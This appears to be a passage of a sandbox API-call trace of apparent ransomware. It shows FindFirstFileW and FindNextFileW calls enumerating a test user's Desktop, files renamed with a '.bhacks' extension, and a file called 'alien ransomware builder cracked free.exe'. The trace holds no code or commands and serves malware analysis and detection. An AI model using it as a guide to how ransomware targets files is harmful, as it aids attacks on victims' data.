lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bede0 [0065.042] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.042] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1418d380, ftCreationTime.dwHighDateTime=0x1d5ca0b, ftLastAccessTime.dwLowDateTime=0x9be42560, ftLastAccessTime.dwHighDateTime=0x1d5d165, ftLastWriteTime.dwLowDateTime=0x9be42560, ftLastWriteTime.dwHighDateTime=0x1d5d165, nFileSizeHigh=0x0, nFileSizeLow=0x15674, dwReserved0=0x0, dwReserved1=0x0, cFileName="7HlCuwMi.pptx", cAlternateFileName="7HLCUW~1.PPT")) returned 1 [0065.042] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58416d40, ftCreationTime.dwHighDateTime=0x1d5d368, ftLastAccessTime.dwLowDateTime=0x95e58810, ftLastAccessTime.dwHighDateTime=0x1d5d616, ftLastWriteTime.dwLowDateTime=0x95e58810, ftLastWriteTime.dwHighDateTime=0x1d5d616, nFileSizeHigh=0x0, nFileSizeLow=0x171e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZR-hhw59bi.bmp", cAlternateFileName="CZR-HH~1.BMP")) returned 1 [0065.042] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x242b1fc1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x242b1fc1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24370b6b, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x16750, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN0hvZxxCeH-NYAF_H.png.bhacks", cAlternateFileName="DN0HVZ~1.BHA")) returned 1 [0065.042] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ffd140, ftCreationTime.dwHighDateTime=0x1d5d3a0, ftLastAccessTime.dwLowDateTime=0xa565dfd0, ftLastAccessTime.dwHighDateTime=0x1d5c89f, ftLastWriteTime.dwLowDateTime=0xa565dfd0, ftLastWriteTime.dwHighDateTime=0x1d5c89f, nFileSizeHigh=0x0, nFileSizeLow=0xf21c, dwReserved0=0x0, dwReserved1=0x0, cFileName="dp gvQR2 MYwMzsW1yo.mkv", cAlternateFileName="DPGVQR~1.MKV")) returned 1 [0065.043] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243e31c1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x243e31c1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa850, dwReserved0=0x0, dwReserved1=0x0, cFileName="iCkvEIW.png.bhacks", cAlternateFileName="ICKVEI~1.BHA")) returned 1 [0065.043] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434c9c30, ftCreationTime.dwHighDateTime=0x1d5cc28, ftLastAccessTime.dwLowDateTime=0x11453020, ftLastAccessTime.dwHighDateTime=0x1d5cfa8, ftLastWriteTime.dwLowDateTime=0x11453020, ftLastWriteTime.dwHighDateTime=0x1d5cfa8, nFileSizeHigh=0x0, nFileSizeLow=0x4dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="kFQqlJY89ZuDyS.ppt", cAlternateFileName="KFQQLJ~1.PPT")) returned 1 [0065.043] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5061a0, ftCreationTime.dwHighDateTime=0x1d5cd77, ftLastAccessTime.dwLowDateTime=0xf08f0a70, ftLastAccessTime.dwHighDateTime=0x1d5cd33, ftLastWriteTime.dwLowDateTime=0xf08f0a70, ftLastWriteTime.dwHighDateTime=0x1d5cd33, nFileSizeHigh=0x0, nFileSizeLow=0x2338, dwReserved0=0x0, dwReserved1=0x0, cFileName="luPvkk7BP6.m4a", cAlternateFileName="LUPVKK~1.M4A")) returned 1 [0065.043] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 1 [0065.043] FindNextFileW (in: hFindFile=0x9bede0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 0 [0065.043] FindClose (in: hFindFile=0x9bede0 | out: hFindFile=0x9bede0) returned 1 [0065.086] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*.docx", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0065.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0065.086] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0065.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0065.086] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0065.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0065.086] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0065.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0065.086] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0065.086] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.php", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.087] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9beba0 [0065.087] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.087] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0065.087] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0065.087] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0065.088] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0065.088] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0065.088] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0065.088] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 1 [0065.088] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0065.088] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0065.088] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 1 [0065.089] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0065.089] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0065.089] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0065.089] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0065.089] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0065.089] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0065.090] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0065.090] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 1 [0065.090] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38e7c380, ftCreationTime.dwHighDateTime=0x1d5d648, ftLastAccessTime.dwLowDateTime=0xe93bdd60, ftLastAccessTime.dwHighDateTime=0x1d5d4c8, ftLastWriteTime.dwLowDateTime=0xe93bdd60, ftLastWriteTime.dwHighDateTime=0x1d5d4c8, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi", cAlternateFileName="")) returned 1 [0065.090] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b79f760, ftCreationTime.dwHighDateTime=0x1d5d23a, ftLastAccessTime.dwLowDateTime=0x3cfbbf90, ftLastAccessTime.dwHighDateTime=0x1d5c9db, ftLastWriteTime.dwLowDateTime=0x3cfbbf90, ftLastWriteTime.dwHighDateTime=0x1d5c9db, nFileSizeHigh=0x0, nFileSizeLow=0xfb6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi", cAlternateFileName="J_GUXI~1.AVI")) returned 1 [0065.090] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b501110, ftCreationTime.dwHighDateTime=0x1d5d535, ftLastAccessTime.dwLowDateTime=0xa751ce0, ftLastAccessTime.dwHighDateTime=0x1d5cba4, ftLastWriteTime.dwLowDateTime=0xa751ce0, ftLastWriteTime.dwHighDateTime=0x1d5cba4, nFileSizeHigh=0x0, nFileSizeLow=0x454f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4", cAlternateFileName="")) returned 1 [0065.090] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 1 [0065.090] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0065.091] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0065.091] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6a2940, ftCreationTime.dwHighDateTime=0x1d5d2ed, ftLastAccessTime.dwLowDateTime=0xbbd52910, ftLastAccessTime.dwHighDateTime=0x1d5c822, ftLastWriteTime.dwLowDateTime=0xbbd52910, ftLastWriteTime.dwHighDateTime=0x1d5c822, nFileSizeHigh=0x0, nFileSizeLow=0xb5e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4", cAlternateFileName="NYVW1N~1.MP4")) returned 1 [0065.091] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0065.091] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, 